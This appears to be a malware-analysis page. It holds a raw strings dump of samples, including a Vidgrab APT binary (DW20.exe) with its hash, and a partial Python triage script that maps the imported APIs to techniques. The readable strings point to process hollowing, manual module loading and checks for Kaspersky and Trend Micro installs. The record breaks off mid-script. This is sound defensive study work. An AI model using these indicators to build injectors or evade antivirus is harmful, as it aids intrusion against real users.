s!rqkbtfe)ijbca{0sw3f`x7qw:_SN>rOEG
()*+,-.
k;<=>?@AB
DGgLIAJK
MNORQRSTUV
YZ[|]^_`abcd%fgHijknmnkpqrstuvsxyz{|}~
 !"#$%&
\LR_,-.
9:;>=>?@ABCDEFGHIJkLM.a"4><7UV[XYZ[
]^_babc
efghijklmnopqr3tu4wxyz{|}~
+)?|
P`Re_,{
32V4
Jr@`B
u------------------------------snip
&h,!
usxx
j7oml6-
OzVZAB
.SLk^-.g
/!0$R9
}x}t{
t_ru
xEt_
VcSM
+F=4
6&0.v,QK
pVsbqw
mLkw
bQfg
|F1`
+8<:
s5$-
~e`d
}i0nno
hc6drCqaa
LMUAI
/*M(qj
(%F'
|>}q
a^_\M\W
ypzsVySoNVlJ
29p'
A{1fz
@s{qrG\
n`hx
I-Tc
91?nR5<z
7#:W;|6
rm'a
S6QT
2H!B
Sl<*($
-##u
q+5vC);{
k?(s
]BU,S{
N]gu
D`EL
=>t83v1
<a 7
BDBR
;Mx+f6x
ypwq
3/*vP*D):
&a%6q
l@;~
yzvtLsUcpk.j(&jm(e
/u`[6]POZ]
VKPMnLF
W@=^>
{(9:
.)L*L
S*ve
p3r?0f
j,k^
T#SC
N]L-
HCFL
 0.*-WC*!
uc2{
-jKoqhy
5SVQW
O]LO
CbAH
n0/w-@**
=$ck'
c%dzvQ`O
V]t[*0RoNL
B[Ca
70e<3
Ws:*11
}Czl
s|pnv
lakyha
eHcral
S^QT
M9YKN
FVnS
8~=
?w W49
&f%T#(I"?
|Q:qywtUv
hvjh
8x7y
avy|
mR,d
]dQ[YZ7
k-<-j)\'1
 c"m
oDX}
o"/s
8Kk/
Xm6u
0|[oa,yZo:g@
d@_:
XIXx
xjFv$
P|S=M
>?;ij'6|4(r
.+'!.o&i
:P(y
'T5Z
SvCYfG
y}~]
YZnr5
E:BrC#
x%Vcc]
%.Jhkncb]
0JOPSSjbb^\
2FGGJOOQRjna[
%%7FFDGJNORhjn[
88DFFJNOSjqXC
88FDJOgr
888DGOh
!78FGJo
8DDM
!8GY
%8DDq
8888
GDD.;
UcF@
----------------snip
Y@5@

Unicode Strings:
---------------------------------------------------------------------------

Vidgrab strings - APT

File: DW20.exe
MD5:  588d3316d4bbfdbb25658d436f06ed96
Size: 118784

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
]{@
Rich
.text
`.rdata
@.data
.rsrc
@ANu-------------------snip
@3@
p3@
Sleep
GetTickCount
VirtualFreeEx
CloseHandle
GetModuleFileNameA
CreateFileA
SetSystemTime
GetLocalTime
GetCurrentThreadId
ResumeThread
GetStartupInfoA
GetVersion
KERNEL32.dll
GetMessageA
PostThreadMessageA
GetInputState
USER32.dll
ADVAPI32.dll
SHSetValueA
SHDeleteValueA
SHLWAPI.dll
memset
__CxxFrameHandler
_except_handler3
strcat
??3@YAXPAX@Z
??2@YAPAXI@Z
memcpy
memcmp
fclose
fwrite
fopen
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
GetModuleHandleA
XY`XX
X[XXX\Z\
X[[
[]W\VH
ZHVG
yXX
01+x(*7?*9XX5x;9667,x:=x*-6xXX16x
x57<=vUUR|[\Zd[[
\ZH
\Pw
\ZP
ZPe
x\@e
YZH
1;0[
W\[H
Y\8XXa
[H[\
XVySY^XX
PZVRZ\Z[
MZ]HZ\xZ\XXHZZ
XXZMx[JKp[PX
Z^^UZGZUZmZ[[k[
\l]JX8{XX
ZT8yXX<ZPW[
^PHJ)
PUWQWHRHZ
RWWSv,= ,
YZM
ZO\[Z
8v*<9,9
{UZI|IT\GP]Z
&XhZC[P\
ZT^[Zp
v*=47;XX
@YZMZIK
XJZTR[ZO
RWWSWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWPWHWHWH\H
NXH
m@xXH[#dXP
0XJ
^XX
P-@^y
^LW
THY
.yXX
uZhZu
',XJH+V0X
ZBX[-P
fXW^h
[TZ
MDZ
XO_Kx_KW
\oKXZ
,]W
_XI
MpZ
/xz
lJrW
Z^W
Z^[
aIW
[7XH
Zx>
^Xx
WXX[
ZPY>XX
XH-S
H>YH
f[Jx-^>ZK
[Uh
X-_ZTYH
{[V
zhHZ
L.2XH
M|Z
XZX
2YX\[
iXH
wJXH
jXHX
Z_YZ
0zY
[^MXZ=
|P\\&H[o[
cZH$
Y8{
ZXX
ZS{
]4Zg
e[^Y
HhXH0XZ0
XZ`
MLZ*d^,XX|
0HiXH
0Z8
Z|Z
rZ|7
ZlW
_r-F
vZ/9Z_T
.Kq
\ZUZ
]Kr
MeZ
eIIK
e8ZH
e<Z^
]0Z^
[Xx8X
MdZ
RNhZU`ZU
@0>J
ZW\ZWc
0@ZSj:k_
ZNTZ
a\a-K0
MHZK
!LZ
L[@Y
)xZ
-wW8Z
]8T
YQP:2Y
TX[g
.KZ
}lZ
XZY
z5T<
}ZSX
Hp4|T
eX:
z'*L
[Tu[]
Y\@+
YXY
-Va]
\(Jj&v
U[P
U,ZA-g0
$[M\k
[V0\|
 ZE
eZ<a\
PXh
U[z
`XX
JlMk
-P\Q
Z-z
Z%Z=Q
ZQTZQ
}x[
[Hf
T-TZ@o
[-~[}
%TX,I_
PZF
ZcM
[Tb]TPyXH
vZTJ@W[WHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
zXX
Z\[K
ZP&Z\(Z\8Z\
Z\dZ\DZ\rZ\[|b{XX
ZTH
CZPDZ\jZ\
Z\[x
ZD[Px]
YZI
ZPZ_P[z
ZQPMZQ
[t[\
VhZCX8
Zx[p
ZP[D_\
\C[t[\
Vh[E
[p`ZP
-[D_\W
_@[t[\
Vh[x+
[T[\
ZLX
L[P[}Z\
ZT:*
Rp~J8jJZFW[XXG
XX [
1*,-94
*==X
YXX
*7;
<<*=++XXXX
79<
1:*9*!
XXZ
/[z
7<-4=
96<4=ZL-qX_
=*+176XX
Xx[
4==(XvX
47+^nX
kjv<44XXaZ
=*.1;=
,9,-Z"YX
=?1+,=*^A
,*4],*Xy
Y4-Z
ZE\
  ^
^#*X
Z/;+,75:Z>
Z+,*6;(!X
\mHxX
Z>KWXWY
161,Z
5XHX
Z59]
9<2-+,
<1.M
{t_\
KXX
ZPXX
.;07+,\5^
91Ju]
W^WHWHWHWHVHSoftwX
are\rar
WYWHWHWHWHWHWHWH
YWHWHWHWHWHWHWHZH
*=9,=L
0Z_<K{
=*6=4
[JW\WHWH
OWHWHWHWHWHWHWHWHWH^H
ZSYhOXXh
heisj
j9j,j#XXj
jZXXkBk~k
XXk
kXXXlPlWlNlxl
luljl`XXlel
l8l5l,l
XXl
m9XXm?m*m'm
XXm
mWnyX`n%n
|Z[X8XXh0h
h\iH
i@i
iZzW[WHWHWHWHWHWHWH
_WHWHWHWHWHWHWHWHWHWHWHXXXXX
XY`XX
>=>>>:Z\
ZPEX[[~[]W\VH.?>>0!
7XX
jVWM
NLQYXXL_S
]_PPQJ
LKXXP
zqm
SQZ[
33\P4
ZH!vH
ZPxI
J^\H
JP\p
J_\pPXu]
\P^
ZPlW]V[4^'Y
W_>n{>>r?<>z
n_E
5?8]W<<\P4
.ZS[\
>>.ZZ>>ZCK
ZNL
[P>
]MN
[<[GZKZiZ[[k\l]JZ^][
?>j?
7]TW^]H<>
)]RW^WHTH[,;TJTU
%Z_J_ZJ
Z%[t
ZP_
Z@[[zL
L[RQ]>>
#[JZ
 ZP
Z__[Zp|_TWPWHWHWHWHWHWHWHWHWHWH
'WHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
?>"Z\0Z\
Z\HZ\`Z\rZ\
Z\*Z\
ZdlZ\ZZ\HZ\
]Z\
Z\:
?>*
Z\|Z\jZ\XZ\FZ\
Z\[
Z\[T
Z\PZ\@Z\[tB
Z\>z
Z\"Z\
Z\xZ\dZ\TZ\FZ\
Z\>
?>2Z\"
Z\|Z\dZ\JZ\
Z\PZ(
ZP,
]Z\xZ\dZ\XZ\DZ\
Z\"
Z\r
Z\^Z
rZ\\ZTPZ\@Z\
Z\>
?>,Z\
Z\&Z\4Z\
Z\pZ\`Z\LZ\
Z\JZ\VZ\hZ\tZ\
Z\ Z\2Z\
Z\K
Z\R
Z\<
J0ZP&Z\
Z\~Z\tZ\jZ\`Z\TZ\JZ\
BZ\
Z\*
zd[
ZH[
8>>
ZP[H
Z\[T
~4.Z
>[\ZETZ|
Z\fZ\tZ\
Z\HZ\"[
Z\ZG>
Z\.
Z\x
Z\LZ\
ZxvZP
Z\&
Z\:ZL
Z\H
Z\\Z\rZ\
Z\*Z\>Z\
Z\:jdlZ@&ZP
Z\lZ\(Z@
Z\pZ\fZ\^Z\8Z
JZPLZh\
Z\bZH
ZhKX
NP<J
Z\lZ\
ZP"Z\^Z\PZ\BZ\
2[dMJ
-Z\QZ\K
ZP4Z\5Z\J
ZPK
7ZP6Z\+Z\:
3ZP*K
ZP2Z\1Z\,Z\
Z\:
[8^J
`pZ\
Z\JZ\[L[\p
[RW\>>XX
JSN>>x>L>W>[>X8P>Z>R>G>p>_>SZH[jy
XZD_>\ZZ[ZR[J>>
/XP
}ZhN>J>
RKZz[>
L\i
ZRbZ\
fZ_>*
>kl\
[TWPZ[F+
IJjZPX
mQXJI_L[bsW]LQMZVXXbwPJ[LP[J
{FNRQL\X[L\JRRWxQLSMbmJQLXX_Y[
~_\]Z[XYVWTXXURSPQNOLMJKHIFGD8Xec`a^WGQGEBC@A>>m[X
z[\KYnLWHWR[Y[Z
mvwxj
}jZ
9Y\S>
r^NZ@iZ
QIM
U[G[
]rZL}R[_L
Z\cZ\C
mZ\BZ\eZ\EZ\^Z\@Z\
Z\Z
ZPaZ\
XXmJ_LJ
NNRW]_JWQ YP
[,[dWDZD
QD[R[]J
shT[ZW_^M^hs_WR^JZ
nR_G
n_KM[WtQNTJ[tL[HWQXyKM
jL_]UQ
p[FJWLhQ
RKS[
kN]
^HzQIP]JZ
yI^LsKJ[PL|LJ
_PZ`Y
vQZ
J?[
_xx_HQLWJr%[L
Q@mJ
]V[
[iPhz
Qtl
u[XL[M\uTtz
T@|Q
8WYVJ
{pk[{>
r[X_W}lz XqipZ
]UL
}lqrr
rq}
u[a
pks_U
\Lx
^PR
[_>
^P\
Z`\
[N_L_j8]
Z\j'>R
}QSNJ
R[[O
>NDczAXLpWCJpv{rl(z{rYY[
wpm{lj[S>
nlwpj
m}l{{J
{f{}kj{_
[E]DZ
m{r{}]h
vqs[u
{pz]l
n[Tm
>Zt{m}\|}
kmZ
rZt}r{
\lZ$j
|\l|L
>3:M34
VD>oo
>]PJ
\HJ
>{ZWJZg>w{
KJQI
R[J
mqxji
$[dH@h[LM
M9W[
U_HHX
[F[ZxRQ_Z
]LGNJ
ZRR
[LLQ<}}QM>qKX8JRQQU
avjj
[@PL[D
n_MMIQLZZ
\Hm[L
[klr[
UhkM[[)Q
W<PL[DS<\H]<P8[LZ'>[P
nqnkK>
]Y:
 Qd
X\/
,Un
L[}L[X|_J[wPMJ_P]L
RWXq\L_LG
NMj
[]E
>RN>
zXX
^pZFWpUpA
[PChms`Xjn
Nh\D^T
]]QKPJ
7S\
{S_WRZ%Z
[tZW>[PO
:5MM_YWPY
mK\MGMJ[SbnLQX*
MzX>W`XJb_`pjb}KLL[PJkg~
PBs[W
>>{4,U
PL^
t$\h{x^
|hR
[h[L[
[P\
WpM
ZZ:
[PS
s_P_Y
^HZ
>kln
@DN
` SL[$KLW,Z,qXXW][bZv[
bqsw
W&>>
xW[RZM>VJJNM
R\PZ_>
mJLz
>]_w
smp
mWYPX
KN>\
zN>
ZDanmjql{Y
FZMi
Z[z
ZIR[p[I\Oh
kPWP
ERk
>.5
fWYWHWHWHWH
WHWHWHWHWHWHWHWHWHWHZH?JV
\^ZHW[WHWHWHWHWHWHWHWHWHWHGFWHWHWHWH[H[M[J;G[TW\[H[UL'
T[TW\[HWx[LS\{m{jj
RJ*
SGWTWH>W
WiWH
]JWH
Q[:
JKN
lGj$k
MbE
Q6III
G_VQQNLQk
]QSQF>>Wx
iWx\
WNWC\
!\_R]
:ROWSWH
WHPHh
^KW_VH
[_\T[{Z
ImgmZ_J
C[K
W\WHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWHgXWHWHWHWHWHWH>mqxji
l{bXXsW]LQMQXJb
]JWH[XX
m[JKNbwPMJ_RR[ZXX
}QSNQP[PJMbE
|XX|
}}}
ZxC>p_S[[)MZ]b[FNRQ
XL[L
M]XZH
Mmgmj{sz
Z>Z>mN[]>Pw[F\
TXZ
_[Zf>>
mGMJ[SlQQHXJ
bM\T
bPJQMULPR^X
\n]{
wZR[
nLQ][MMX
>y[Jj]Nj_\ZLX_W[
IH\WJV
Z#>9
Z9[
kpupqX
ZImJ_J[
H_RK[
XXz{r{j{
j}|>>jws{x
wjZir
}uZS>
I}rqmwpy\P_yxwp\s
ZX>PT
>>{mj
|rwmv{zX`>mgp
l{}{whZUZ
[Hm{
Rp[
>Z{j{p[
}n9
DHM
]^Zk>{LLQL
Q]_X
JWPY
S[SQLG>
MJhMIv\
>kz_`
W`^`4[
ZMH\
WLoK[LGzlLHW][
8ztPXWY
ShZ
\xZT
\TQo>
9ZZZlmXH{lhw}{a|qqjaJ
lj9vT>_L}>_N>P@
kjq_N_tz{s
Tpz_NQtzwmJ
{z{E_tu{lp
{razlJ
lZA_@xwr{a^-_EYX_Diwp
aqipanlq}{
YmmR`]Dmvj
RFQ
wpj{l
}VTjZ7TxZ
>n_KM[z
\Pan[P
ZA}QPz_K[RK>lKPP]Fi
JQNSDz
LJRImZx[
Mz3Z
J6>>
ZR{Pk
KJ8XQZW_RZ
JbiWPZQIMxxb}KLL
ch[LMWQP
PLP[JziJZ
YM>_z`_N
ZRZ
>>bVI
JoK8
[LM
\WPZ
ZZP3|
{PJLXZG
Zr>>
Rp>9
>>9
K9z
K[=
u[G[
ZIPH[
{lZH
{FJJ#[ZkZ
8>RL
,>wXYNVRN_NW
>W@^?Z@
_Z7ZP[
]j]
[H]r
[H_xKJ
p]QL]
[L[
WH]
>>^X[K
ZOZ
>>]
ZZIQ>N>[>M
ZVFZ\ZCz
Z>RZZ[T
]>>lZQmZ\vZ\J
P]9
Z??Zs>ZNXu<ZH
Xs=]P
2y:K
]M0{
9x^Pp^P}^Pz]PZ^bO[Z
Z(][
>>BZIJ@MB
MW[[JZ@Z[FB
Z[M[lX[pQ>>g[M>G
kPUPQIL@>>n
Z;>hWMJ_ZQZL
[DfnPH
[Hpj
\lpj
\Ps
ZV>>vjjnXH
sQH
Yn[L\YS_
YRG34r<<QP
VJJNHx
KNZ_J[
]8XQS
jGN[
TFJ
VJSR\AP[
u[[HXN
$3434
|_ZXH
l[OK[MJ
wP*
ZG[
,QZIb
*[\M_X[
]V\T_pr
YZ4Zh]B
m{K{>_
\_WZN|K[
Zk>
X_:
WNXX
M[J
ZPM
ZVTC]NWpRp_ZZL
UtJZ
ZUXFMMJ
QRm[Jb^Sbp[JIQLU
XXz
}HX{
C>|
7>>
nwz
ZOM
[J]I
_bz<;]SK>
SI[d
sU\\
4\^
nRKYWPl 34
ZmJ
z{m}lw
znjwqpb
Mb}z
L_R
OQLhXb
>>PU
mJLWPY>
|KWRZ
nkJSZ?X^>
+DJ>F>J_XZA[
zWMNR_Gz
>>^@[
_Tw]QP>
lRR[
PW`[L
Q`>e
Mc[
xJa[
>>s]j%[>>
J_>
\Tj
mZn>
hy>
H_M[
[|[
[Tk
X]]mH]vj
^H\
H\jL_G^yM]V[Z^Tl_HsQ
YP]UmX}JR
]V>>kXm[
YPJQHp
]Vs]MVW[R_
xPM]MLH]
uhIM]]s>LT
WMz
]Uu
hMH^AsnP#
HN\y-HZ
\MZ
PQZ
RHLJHPPM]_]
L_HJ_MU\s_HYL
MF\S>lMQ
_MVm[LH\AZ<zTM_
UF[[(>UIM[P\xxLDm
HJ_J[
u\W>
[Ppqz
H[m[
qbw[}V[]U
lK_K]RJM]
k<&Z
JPU
w{f
-]W>
]S\
;`Z_>U0W
8jFI_L[
lgtntlKPbk
JV[
PJo
nZoM
WoWoWoJVM
bw{O
LLV
PEN;Q
g}r{lb
JS<
+5T@[
rK8+S*N
wWGZa
nX*
Z\Z[xbb
bmQKPZ
[Lh
ZMMX]aQM
QN[
\6Z
q\L
|L{V^
gmG
ZD[
ZC>Z#
bS[PK
>>J
.L>.
YN>.
1[MZ\
H>.
O>*2.ZS> Z]_@ZS>
^@-ZU9Z\JnR
QY]
{m{jZK>b@
[T\hWP
N_JW\R[
[@\K
XX[L
>WPMZJW]W*
S[SQLG>Z
__z
b[_S_V(
>>XWZ
^f_DPZ>
zQDXP_Z
[4_\^
j%.
'VB]
haZ
tP~~_hSxJ
>aWPXQZG
A>.X
>.FZ\@Z\
XXo7
XX#
TvO
UZD
qb?*
R8]]
XX36
`.Wr
LXXOY
UXX
~XX
gXX
(XX_
1XX
/rVf
H8O
XX.
&XX
3TA
?XXb]
oUU\_R"
pXX>\
8RE
iXX
BXX
[XXr
ar4
XXB3
O;n
..5
XXR
XX(
M,5]
TS3
XXdTD5
9Cz
8Wci\
XX8UPH%
XXt
lXX
uXX
r%4
^XXD:
GXX
=y5
:XXT
#XX
TK4XX
Y9L-XXi>;
XX%
VPXX
QIXXy
NT1
8XbXX5?/
U_{XX
R(F
syWw
XXIP
XXY
<%Vc
>ZY
RZ{
XXq6
XX_k
XX;g
ccI
"RR
0dXX
UQW
NXXH
795S
"XX,
OjN
[UXX
9XX
TC%
XXf;qG
z@\
"jXX
XX-7>
XXIjc
\L#
qXXgf,0('
XXp
7XX
VI[XX
J%7#
,XX:
vlN
@XX^
XX.qc
a0R
XXJ},d
IXX
%XX
RXXd q
+a@
">XX
Q%c
xXX
A]j
XXs
 MI
XX9
xDI
cXX]p
=9R
00XX
qY=
\XXr!
+XX
%>j
mGXX
wh@
XX\-
XX8
[yP
mXXK
XX/
|DI
XXe
vXX
(q;
XXo-0
k2ZXX
$7m
yb5NXX
# I
#^
XX5
rM.*XXd
XXxs
[n<
fXX)`
rXXs\
XX"O
g M
L"XX
qoHL
)J{
KFXX
uA(63C
XXJ
 |F
z@S
PRXX
IT<l
W6XXA
+S]X
+wp!muGK
XX]
7"p
p~{
zzXX
Mf1~
w|#
}nXXV
jY<
Ki7
*Bn
bd{Q`S
XX%
bXX
;3D
XXt
XX.$
vXX
/ix
^XXcF
XX2U
:XX
.XX
w~&
XXhi
J9zXX
-;I
9au
HkK
\1w
av+
>ZY[XXY
XXq6CZ
h.]f
i'n
Y}6LK
+XX&/
$|XX
yD6
eXX
2XXa
XXIfl3
dqi
QwA
XX6
BXX
fXX
H*1XX
XX)"
@W0
EUvI
XXV
:_r
@nX
XX~;
2"$
AXX
XXX
j^z
XX9
xY)
j<N
XXn
(XX
XXFk
`XX
@ny
\7XXx
XXP
w)tp
XX/
T"`
GXX
;'Us^XX@
x>V
XXh]
m76+
pL#
x/'
.XX?D^
iyXX
`/{8
sH]XX
ZoG
XX
{5\0
'9Wr
,Oc
XXw
-XX
RzXX_
cXX
#g4XX
XX0I
Po"
XXO
Ew3
XXgP
Yo!
DXP
>I9
'NT
BXX
.ZT
hZU
*?bq]8RXX
rW.XX`
YOL
XXy
XXR
bXXK
>XX
XX6
fVrXX/
OXX8
XX!
&AT3
]b?UUo
"R_XX\
\>pR8
XXE
XXn
XXw
r[s
oXX
=#XX
4ra
n;O
5..
3XX
IXX
]5,
3ST
DTd
VW8
\ic
[YXX
OPU8
DdY
XX@
iXXY
4%XXr
:D^
XXk
XX$
5yXX=
5XX
L9Y
;>i-
DXX*E
XX3B
XX|V
XXeQ
1TXXNX8
/?5b
XXW_U
^(XX
wWys
dXX
8XX
_tXX
cV%<
X'%
XX\
:CI
{hdXX
,om
XXN
Icc
RR"
XXx
[cc
QUXX
59XX7
NXXjO
"XX
XX%Cf
Gq;
\@z
qXX
>7{
XX\
bUG
#~jXX
(0,f1+
XXN
XX7
,XX
@XXx
[IV
#7XX%J:,
G[XX
N^@
XXjF
cqx
R0S
d,}
RXXN
>XX
$Vd
e}IXX
q 2
%XX
XX\
]XXs
YXX
XX9
IMvN
XX]c
cx$
|@j
=kG
XXr\
j>%
q)n
@hE
XX\
XX8
PXXKm
jTXX/
%XXX
\XX
XXe
P<x
XXg97
;q(XX
0-o
45byXX
I  ^#XX
.MrXX
d**
D)D
XXs
<nXX[
`)f
XX?
/?XX
eXX
\sr
XX+
4XXO
M g
"Hoq
XX{@
FAu
qC36(B
\XX
F|
S@z
RTI
l<W
A6]S+
XXo[
WXX
)um!pt
KXXGq
p"7
{~p
z~1fM|w
XX#j
Vnk
<YiK
XX7m
nB*
@XX
=`Q{da
XXS
D3XX;
XX_
WbXX
k8XX
XXK
xiXX/
Fc^
uXX
$XXc
&~XXw
5/XX
z9J
XX'
GXX
I;-
XXC
ua9
XXW
LXX3
PXX
KkH
w1\
[XXk
+va
\XX
C6q
f].hn'XXi
EXX
KL6}
XXAN
/&+
6Dy
nXX
qdI
XX.
lfI
iqAwXXQ
XXy'<
*XXf
*HXX
XXN
gr+
IvU
3XX1
rzQXX
Xn@h
zXX^j2
N<O
XXv
V)G
cXX
XX!
gXX
`yn@
XX7
~XX
XXH
XX`"q
sUXX';
7XX
V>x
+67m#LXXp
.XX
'/x
XXXK^D?.L
{/`
HsXX
XXGo
rW9
XXo
jXX
cO,
Heb
XX8
AXX
cBH
g#XX
XXW
b?@
"oP
XXX(
w7:XX
3wE%
!J2
XXZ[XR_J[
}QXXNGLWYVJ
t[_P
RQKN
y_WR@
[`_\
>.:>:>6Z\Y:t
[T;>.ZV]T8>
ZZ]T:Z@.>
>.6ZR[@_T
ZR>?
R[@[R<?>:]T<?ZT.[T
Z%@
8?.>>
Z\~Z\[G>WYSH?ZUS\<ZH5
S\=ZHS\:ZHS\;ZHS\ZWW[>_8_
8Zb[\9ZP[\6ZP[\7ZP[\4ZP5
[\5ZP[\2ZP[\3ZP[\Z_W[WHWHTH[
[X[
[$./,>69784;5:2=X
3<0?1>2>6>
Z\rZ\
Z\RZ\
Z\"Z\
Z\bZ\
Z\BZ\
Z\<Z\
Z\|Z\
Z\\Z\
Z\,Z\
Z\lZ\
Z\LZ\
Z\4Z\
Z\tZ\
Z\TZ\
Z\$Z\
Z\dZ\
Z\DZ\
Z\8Z\
Z\xZ\
Z\XZ\
Z\(Z\
Z\hZ\
Z\HZ\
Z\0Z\
Z\pZ\
Z\PZ\
Z\ Z\
Z\`Z\
Z\@Z\
Z\?Z\
Z\_Z\
Z\/Z\
Z\oZ\
Z\OZ\
Z\7Z\
Z\wZ\
Z\WZ\
Z\'Z\
Z\gZ\
Z\GZ\
Z\;Z\
Z\{Z\
Z\[Z\
Z\+Z\
Z\kZ\
Z\KZ\
Z\3Z\
Z\sZ\
Z\SZ\
Z\#Z\
Z\cZ\
Z\CZ\
Z\->7>-?7>
ZPmZPmZP
ZPMZPMZP
ZP5ZP5ZP
ZPuZPuZP
ZPUZPUZP
ZP%ZP%ZP
ZPeZPeZP
ZPEZPEZP
ZP9ZP9ZP
ZPyZPyZP
ZPYZPYZP
ZP)ZP)ZP
ZPiZPiZP
ZPIZPIZP
ZP1ZP1ZP
ZPqZPqZP
ZPQZPQZP
ZP!ZP!ZP
ZPaZPaZP
ZPAZPAZP
ZP>>9>
~Z\
Z\^Z\.Z\nZ\
Z\NZ\6Z\
vZ\
Z\VZ\&Z\fZ\
Z\FZ\:Z\
zZ\
Z\ZZ\*Z\jZ\
Z\JZ\=z|
Z\}Z\
Z\]Z\
Z\>>
;>&ZT:Z\*Z\2Z\"Z\<Z\
,Z\4Z\$Z\8Z\(Z\0Z\ Z\?Z\
/Z\7Z\'Z\;Z\+Z\3Z\#Z\=Z\
Z-Z\5Z\%Z\9Z\)Z\>?<=::
;;8ZY9ZY6^Y7^Y4VY5VY2WY
eVH3WYVH0WYWHWHVH1WYWHWHVH>>
:V,--*ZY+ZY(^Y)^Y&VY'VY
$WYVH%WYVH"WYWHWHVH#WYWHWHVHY
|X;8966774455K
K?Ks
.^Y/^Y,^Y-^YJoT[J
T[N
P_N
WW&F7WW'F7WW$F7WW"
<ZQ
=Z\:Z\
8ZP9Z\
4ZP
0ZP.-mZ\*Z\&Z\[e
ZP^Z\NZ\
Z\_[W,[(
[4[0[<[8[
>Ze
Z\>S
Zq>.fZ\
?.rZP
Z\"Z\2Z\
p>.[D?*[
>:X>\4>>x_
o5[
Z}_x
4XP
Zh/
5>^6=
t+G;m
|XyR
VH.
HP5
?cQ(.c
^QH
Xql
CVxHWZM>>.>J
B>.
ZPh
J8>^Y
ZY^S>NZ|_T[P
?Z]
VL[d
Zh[[
^x[T[\[
VL[d
^Lk
c.h
K6XXiT?
{21
Z_XY
XXu
}?1
XvK
+>>1
eZp\
o?=
ZP<^P=^P:^P;
^P8^P9^P6^P7^P4^P5^P2^P3M
^P0^P1[P=
.v1
8s2
wZ{
JV1\
a`ec
mkhXX
/>.m
mmm
|X8
ZS------------------------snip
xYHz
82:
1XY
Y(s^
>>>
YXZ_,
zz4
Lz<
&YXz0Y
K\Y
rYPj
XPf
?>"Z_
?>Fzp
Pjbs
8XZ,
zFPR
XX,
XZr
XX9
zRc:
J >
Z*>
Xrb
B*(
.bz$
~2:fR
XPv
vbRB
0j@p
W[WHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
GWHWHWHWHWHWHWHWHWHWHWHWHWH>
mCZ
I7TS
.K7
w_i
+Rx
[ba^
WriteProcessMemory
VirtualAllocEx
kernel32.dll
VirtualAlloc
GetProcAddress
GetModuleHandleA
VirtualProtect
LoadLibraryA
VirtualFree
SOFTWARE\KasperskyLab\AVP6\environment
ProductRoot
SOFTWARE\KasperskyLab\protected\AVP9\settings
Ins_ProductPath
\UIFramework\uiWinMgr.exe
SOFTWARE\TrendMicro\Vizor
ProductPath
Kernel32.dll
\avp.exe
\klwtblfs.exe
SOFTWARE\KasperskyLab\protected\AVP12\environment
\wmifw.exe
ReadProcessMemory
CreateThread
Sleep
GetThreadContext
CreateProcessA
%SystemRoot%\System32\svchost.exe
Shlwapi.dll
SHGetValueA
VirtualProtectEx
%temp%\tmp092.tmp
Software\rar
data
\fxsst.dll
%SystemRoot%
IDI_ICON5
wwwwwx
D@w
wwwwx
xwp
DDD
wwwwwwwx
wwwwww
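The readable part of the Vidgrab dump is its import list: WriteProcessMemory, VirtualAllocEx, GetThreadContext, CreateProcessA, ResumeThread and a svchost.exe path (a hollowing-shaped set), VirtualAlloc/VirtualProtect/LoadLibraryA/GetProcAddress (manual PE mapping), and registry paths for Kaspersky and Trend Micro products. The script below is an added example, not the page's own tooling: a capability triage that matches API sets and substrings against a strings dump. RULES is my own mapping and is not exhaustive; the two input lists are copied from the Vidgrab dump above and from the Gh0st hgif dump further down this page, limited to what is visible in those dumps.

```python
# Added example, not the page's own tooling: capability triage over a strings
# dump. RULES is my own API-set-to-technique mapping; the input lists are
# copied from the Vidgrab strings above and the Gh0st hgif strings below.

VIDGRAB_STRINGS = [
    "Sleep", "GetTickCount", "VirtualFreeEx", "CloseHandle", "GetModuleFileNameA",
    "CreateFileA", "SetSystemTime", "ResumeThread", "GetStartupInfoA",
    "SHSetValueA", "SHDeleteValueA", "WriteProcessMemory", "VirtualAllocEx",
    "VirtualAlloc", "GetProcAddress", "GetModuleHandleA", "VirtualProtect",
    "LoadLibraryA", "VirtualFree",
    "SOFTWARE\\KasperskyLab\\AVP6\\environment", "SOFTWARE\\TrendMicro\\Vizor",
    "ReadProcessMemory", "CreateThread", "GetThreadContext", "CreateProcessA",
    "%SystemRoot%\\System32\\svchost.exe", "SHGetValueA", "VirtualProtectEx",
    "\\fxsst.dll",
]

GHOST_STRINGS = [
    "CoCreateInstance", "CloseHandle", "VirtualFreeEx", "WaitForSingleObject",
    "LoadLibraryA", "GetProcAddress", "GetModuleHandleA", "WriteProcessMemory",
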